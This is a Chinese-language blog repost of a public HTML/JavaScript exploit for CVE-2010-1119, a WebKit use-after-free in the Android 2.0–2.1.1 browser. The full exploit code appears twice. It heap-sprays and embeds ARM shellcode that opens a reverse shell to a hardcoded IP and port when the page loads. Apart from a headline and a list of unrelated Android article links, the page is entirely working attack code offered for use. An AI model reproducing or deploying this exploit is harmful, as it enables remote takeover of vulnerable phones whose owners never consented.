Android 系统 攻击0DAY! WebKit Use-After-Free Exploit 受影响版本:2.0 ,2.1, 2.1.1
2011-04-25 23:01
232 查看
<html>
<!–
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119
This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
–>
<head>
<script language=”JavaScript”>
function heap()
{
var id = document.getElementById(“target”);
var attribute = id.getAttributeNode(‘id’);
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape(“\u0058\u0058″)); };
var scode = unescape(“\u0060\u0060″);
var scode2 = unescape(“\u5005\ue1a0″);
var shell = unescape(“\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002″);
shell += unescape(“\uae08″); // Port = 2222
shell += unescape(“\u000a\u0202″); // IP = 10.0.2.2
shell += unescape(“\u2000\u2000″); // string terminate
do
{
scode += scode;
scode2 += scode2;
} while (scode.length<=0×1000);
scode2 += shell
target = new Array();
for(i = 0; i < 300; i++){
if (i<130){ target[i] = scode;}
if (i>130){ target[i] = scode2;}
document.write(target[i]);
document.write(“<br />”);
if (i>250){
// alert(“freeze”);
nodes[0].textContent}
}
}, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>
<!–
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119
This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
–>
<head>
<script language=”JavaScript”>
function heap()
{
var id = document.getElementById(“target”);
var attribute = id.getAttributeNode(‘id’);
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape(“\u0058\u0058″)); };
var scode = unescape(“\u0060\u0060″);
var scode2 = unescape(“\u5005\ue1a0″);
var shell = unescape(“\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002″);
shell += unescape(“\uae08″); // Port = 2222
shell += unescape(“\u000a\u0202″); // IP = 10.0.2.2
shell += unescape(“\u2000\u2000″); // string terminate
do
{
scode += scode;
scode2 += scode2;
} while (scode.length<=0×1000);
scode2 += shell
target = new Array();
for(i = 0; i < 300; i++){
if (i<130){ target[i] = scode;}
if (i>130){ target[i] = scode2;}
document.write(target[i]);
document.write(“<br />”);
if (i>250){
// alert(“freeze”);
nodes[0].textContent}
}
}, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>
相关文章推荐
- Android官方使低版本系统(2.1)支持ActionBar的方法
- Android 1.5 1.6 2.0 2.1 2.2各版本更新概要
- Android系统:L版本怎样识别耳机按键长按or短按?
- [Android1.5]Android2.0版本以下Activity切换动画效果
- 一个在线看android系统各个版本源码的链接
- IE8爆出0day,影响所有版本Windows
- Android 系统信息获取(CPU,RAM,ROM,Battery,SD-card,版本等)
- Android 最全适配不同语言、屏幕、系统版本及常见适配方法
- android系统信息(内存、cpu、sd卡、电量、版本)获取
- Android获取系统的硬件信息、系统版本以及如何检测ROM类型
- 解析Android获取系统cpu信息,内存,版本,电量等信息的方法详解
- android使用andFix增量更新,在ubuntu系统下,Eclipse版本
- Android系统休眠对程序的影响以及处理
- 获得Android系统的唯一标识、android版本、网络接入方式、当前网络接入方式的MAC地址、IP、CPU的利用率、CPU的负载、内存大小
- ffmpeg3.3 编译 android 系统版本 32位 和64 位 动态库
- Android 系统信息获取(CPU,RAM,ROM,Battery,SD-card,版本等)(转)
- Android 系统信息获取(CPU,RAM,ROM,Battery,SD-card,版本等)
- android 利用反射获取当前系统sdk版本等属性
- android最新源代码的编译及运行(android版本5.0.1r,编译系统ubuntu14.10 x64)
- Android 1.5 1.6 2.0 2.1 2.2 2.3 3.0,4.0的区别